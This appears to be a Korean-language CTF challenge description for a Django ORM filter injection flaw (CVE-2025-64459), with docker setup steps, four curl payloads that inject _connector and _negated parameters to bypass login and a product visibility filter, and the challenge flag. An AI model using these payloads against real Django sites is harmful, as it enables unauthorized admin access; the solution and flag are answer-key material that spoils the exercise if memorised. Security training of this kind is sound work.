
Django ORM 필터 주입(CVE-2025-64459)을 시연하는 CTF 챌린지: 인증 우회 및 제품 필터 우회 익스플로잇, 배포 및 플래그 검색 포함.
카테고리: 웹 보안
난이도: 중간
취약점: CVE-2025-64459 - Django ORM 필터 인젝션
우리는 관리자 패널이 있는 안전한 상품 샵을 구축했습니다. 인증을 우회하고 개인 관리자 노트를 찾을 수 있나요?
URL: http://YOUR_SERVER:6008
cd web_django_cve
docker-compose up --build -d
# Using _connector=OR
curl "http://HOST:8054/login/?username=admin&_connector=OR&is_superuser=True"
# Using _negated
curl "http://HOST:8054/login/?username=admin&_negated=True"
# Negate is_public filter
curl "http://HOST:8054/?_negated=True"
# Direct access
curl "http://HOST:8054/?is_public=False"
lol-you-here_then-you_exploited_me